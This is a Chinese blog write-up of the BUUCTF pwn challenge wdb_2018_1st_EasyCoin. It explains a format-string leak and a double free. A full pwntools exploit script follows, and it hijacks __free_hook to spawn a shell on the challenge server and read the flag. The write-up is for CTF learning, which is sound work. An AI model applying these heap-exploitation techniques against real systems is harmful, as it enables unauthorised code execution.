[BUUCTF-pwn] wdb_2018_1st_EasyCoin

最新推荐文章于 2022-02-23 21:25:04 发布
最新推荐文章于 2022-02-23 21:25:04 发布
阅读量1.9k 收藏
点赞数
分类专栏: CTF pwn 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122599200
版权

原版的exp是这 网鼎杯-EasyCoin | e3pem's Blog 

看了半天好不容易弄明白。

漏洞点有两个,第1个比较容易,登录后输入4个字符不在菜单里的就直接printf,不过就4位也干不了嘛。把0-9都试一遍找到3和9分别是libc.write+0x10和heap_base+0x10也算是有用

        default:
          printf("[-] Unknown Command: ");
          printf(buf);                          // fmtstr不正确的输入可以执行printf(...)
          break;

第2个漏洞是当自己给自己转账的时候当删除用户时先删除对方凭证再删除自己的凭证。在删对方凭证时从对方链里找,这里当一个块被删除后fd的位置就是上一个块的开始位置与下一块指针就差-10。

free自己的部分

  free(*a1);
  free(a1[1]);
  if ( a1[3] )                                  // 删除交易信息
  {
    v4 = a1[3];
    while ( 1 )
    {
      sub_4012A0(v4[1], v4[2]);                 // 删除收款方的交易信息 按对方用户名删除,仅检查用户
      if ( !*v4 )
        break;
      ptr = v4;
      v4 = (_QWORD *)*v4;
      ptr[1] = 0LL;
      *ptr = 0LL;
      free(ptr);
    }
    free(v4);

调用sub_4012A0删除别人的手里的凭证

  if ( *(_QWORD *)(a1 + 24) )
  {
    v4 = 0LL;
    for ( ptr = *(_QWORD **)(a1 + 24); ptr[2] != a2; ptr = (_QWORD *)*ptr )// 相同凭证号的
    {
      if ( !*ptr )
        goto LABEL_11;
      v4 = ptr;
    }
    if ( v4 )
      *v4 = *ptr;
    else
      *(_QWORD *)(a1 + 24) = *ptr;
    free(ptr);
    result = 0LL;
  }

在这里当free 100后再 free 0d0 ,原来0d0的位置变所上一个块的起始位置0f0而对方是自己,就时会把0f0当成下个凭证的指针继续找,提前在0f0位置写上一个正确的指针:有块头可以被free,有相同的凭证号可以通过检查。这个块就会被free 。

这里由于free掉对方后还会free自己的凭证会形成double free,但这里已经得到重叠块不需要loop了。

free以后得到 0a0<-1390<-070<-1360<-070 loop

先将前两个耗掉,并且把070的fd置0(通过0块的修改密码功能)取消loop,再建一个用户用070作为管理块,这样0块修改密码就能控制新块的管理块的指针。这里将新块password指针指到__free_hook.然后用新块登录修改密码(改__free_hook里的值)为system

这时候free_hook劫持已完成,再建个块写入/bin/sh 然后free掉就行了。

from pwn import *

'''
patchelf --set-interpreter ../buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
patchelf --add-needed ../buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so pwn
'''

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 27049) 

libc_elf = ELF('../buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context.arch = 'amd64'

menu = b"> "
def add_user(username,password):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"Please input username\n> ", username)
    p.sendlineafter(b"Please input password\n> ", password)
    p.sendlineafter(b"Verify input password\n> ", password)

def login(username, password):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"Please input username\n> ", username)
    p.sendlineafter(b"Please input password\n> ", password)

#after login
def show_user():
    p.sendlineafter(menu, b'1')

def send_coin(username, cnt):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"What user do you send to?\n> ", username)
    p.sendlineafter(b"Hom many?\n> ", str(cnt).encode())

def show_tran():
    p.sendlineafter(menu, b'3')

def edit_password(new_pass):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"Please input password\n> ", new_pass)

def free_user():
    p.sendlineafter(menu, b'5')

def logout():
    p.sendlineafter(menu, b'6')

def other_cmd(cmd):
    p.sendafter(menu, cmd.encode())

#gdb.attach(p, 'b*0x401489\nb*0x4014bb')
add_user(b'A', b'A'*16+b'\x30')
add_user(b'B', b'B')
add_user(b'C', b'C')
login(b'A', b'A'*16+b'\x30')

'''
for i in range(10):
    other_cmd(f'%{i}$p')
'''
other_cmd('%3$p')
p.recvuntil(b'Command: 0x')
libc_base = int(p.recv(12), 16) -0x10 - libc_elf.sym['write']
libc_elf.address = libc_base
print('libc:', hex(libc_base))

other_cmd('%9$p')
p.recvuntil(b'Command: 0x')
heap_base = int(p.recvuntil(b'\x7f')[:-2], 16) -0x10
print('heap:', hex(heap_base))

edit_password(p64(heap_base + 0x70))

#pzh = 0x31
[send_coin(b'C',1) for i in range(0x2e)]
logout()

login(b'B', b'B')
send_coin(b'A', 1)
free_user()

add_user(b'B', b'B')
login(b'B', b'B')
send_coin(b'A', heap_base + 0x70) #money = next_ptr
send_coin(b'B', 2)
'''
0x1f62070:	0x0000000001f620c0	0x414141414141410a <- password fake
0x1f62080:	0x0000000000000030	0x0000000000000000 <- fake_pzh 0x30 
0x1f62090:	0x0000000000000000	0x0000000000000031
0x1f620a0:	0x0000000001f63330	0x0000000001f63300
0x1f620b0:	0x0000000039a4a990	0x0000000001f620d0
0x1f620c0:	0x0000000000000000	0x0000000000000031
0x1f620d0:	0x0000000001f620f0	0x0000000000000000 <- free 0d0 fastbin:fd= 0f0 ,fake_next:0f0=070
0x1f620e0:	0x000000000000002f	0x0000000000000000
0x1f620f0:	0x0000000001f62070	0x0000000000000031
0x1f62100:	0x0000000001f632f0	0x0000000001f620a0   
0x1f62110:	0x000000000000002f	0x0000000000000001
0x1f62120:	0x0000000001f62070	0x0000000000000031
'''

free_user()
#0a0 <- 1390 <- 070 <- 1360 <- 070 loop

context.log_level = 'debug'

login(b'A', p64(heap_base + 0x1350))
send_coin('C', 1)
edit_password(b'\x00'*0x10)  #clear loop  fastbin:070
logout()

add_user(b'D', b'D') #manage_chunk = 070 = A.chunk_password

login(b'A', p64(heap_base + 0x13c0))
edit_password(p64(heap_base + 0x13c0) + p64(libc_elf.sym['__free_hook'])) #D->password:free_hook
logout()

login(b'D', b'\x00')
edit_password(p64(libc_elf.sym['system'])) #free_hook->system
logout()

add_user(b'E', b'/bin/sh')
login(b'E', b'/bin/sh')
free_user()

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF过滤括号的盲注题小记
大方子
08-20 4926
【说在前面的话:这是我做的第一个过滤了括号的盲注题目,看着论坛里很多人都有打CTF,就发出来一起交流一下,还望大神轻喷。文章本来应该归类到CTF的,可惜我发帖数量不够,访问不了。如果发帖不正确也请跟我练习,我会按照要求改动】 解题过程: 题目的代码: &lt;?php // auth:“蓝鲸塔主” $dbhost = "localhost"; $dbuser = "root"; $dbpas...
pwn】DASCTF Sept 九月赛
woodwhale的博客
09-26 3701
pwn】DASCTF Sept 月赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址,通过创建fake rbp进行栈迁移,而这个栈存有我们写入
每天一道CTF 第二天
scrawman的博客
03-01 770
今天这个题目很简单,但我还是做了好久。有一些payload之前试了没成功后面再试又可以了,搞得我也很疑惑,不知道自己是不是之前引号没打对还是空格没打对。 进入正题: [极客大挑战 2019]EasySQL 题目就告诉我们了是要SQL注入 在用户名和密码分别输入admin’,password,报错显示如下 admin,password’,报错显示如下 admin’,password’,报错显示如下 结合三种情况来看,username使用的是单引号,password使用的是双引号。或者再用admin'#
int_overflow [XCTF-PWN]CTF writeup系列9
重新启程
12-20 936
题目地址:int_overflow 先看看题目内容: 这道题目的名字已经把漏洞说明白了,就是整数溢出漏洞 那我们就照例下载文件,检查保护机制 root@mypwn:/ctf/work/python# checksec abd631bc00e445608f5f2af2cb0c151a [*] '/ctf/work/python/abd631bc00e445608f5f2af2cb0c...
HITCTF2018-web全题解
蚁景网安学院
02-07 2796
点击蓝字关注我们前记最近参加了一下哈工大办的HITCTF,感觉题目可以学到知识,于是分享一下我的题解~01PHPreading发现文件泄露http://198.13.58.35:8899...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
BUUCTF之“oneshot_tjctf_2016”
Probeginner的博客
12-21 573
当做onegadget的复习
CTF代码审计
weixin_43749601的博客
10-20 2155
extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 1、extract()函数使用数组键名作为变量名,使用数组键值作为变量的值,当变量
实验吧 CTF 题目之 WEB Writeup 通关大全 – 3
DarkN0te
02-24 1584
文章目录让我进去拐弯抹角Forms天网管理系统忘记密码了Once MoreGuess Next SessionFALSE 实验吧Web题目系列3 让我进去 题目链接 http://shiyanbar.com/ctf/1848 题目描述 相信你一定能拿到想要的 Hint:你可能希望知道服务器端发生了什么。。 格式:CTF{} 解题思路 用burpsuite抓包后,发现cookie里有一个字段s...
黑马python2019吾爱破解_2019KCTF 南充茶坊(python逆向)
weixin_39538847的博客
12-19 489
1.前言本文讲的是一道python逆向题,逆向分析python打包程序,首先对它进行解压缩,使用python逆向工具提取出关键py文件,分析py文件的算法,然后写出求解flag的代码。2.工具1.x64dbg3.pyinstaller4.3.解题过程1.选该软件,右键发现可以解压缩,用binwalk工具发现南充茶馆.exe里面有压缩文件,解压缩后有CM.exe和aplib.dll,用binwa...
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1293
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
CTF平台题库writeup(四)--BugKuCTF-代码审计(14题详解)
渗透、攻防、CTF、编程
07-04 4372
1、extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 知识点: 变量覆盖 file_get_contents():将整个文件读入一个字符串 trim()去除字符串两侧的空格或者指定
学习笔记lalala
weixin_56780239的博客
02-23 269
orw:发现写shellcode的新大陆 from pwn import * p = remote('chall.pwnable.tw',10001) #p = process('./orw') context.log_level = 'debug' context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c'] if args.G: gdb.attach(p) shellcode = "" shellcode += shellcraft.i3
在栈和堆分配内存
心想事成
10-26 449
在栈和堆分配内存LUNICODE_STRING Src ; LUNICODE_STRING *Dst1 = new LUNICODE_STRING(); LUNICODE_STRING Dst2; RtlInitLUnicodeString(&Dst2, L""); RtlInitLUnicodeString(&Src, L"microsoft-windows-ie-windows-internet
confused_flxg
weixin_43906500的博客
01-08 446
目录 实验步骤 1.测试程序功能 2.使用IDA进行分析 3.查找flag位置 4.使用python解密 实验步骤 本题为Hackergame 2018的一道题目 1.测试程序功能 解压压缩包,执行程序,如下: 按照输入要求输入程序,得到以下结果 使用python解码可知,此flag为错误的 使用peinfo查看文件相关信息 可知文件并未加壳 2.使用IDA进行分析 使用Shift+F12打开字符串表 经过大量经验可知重点关注\n,...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值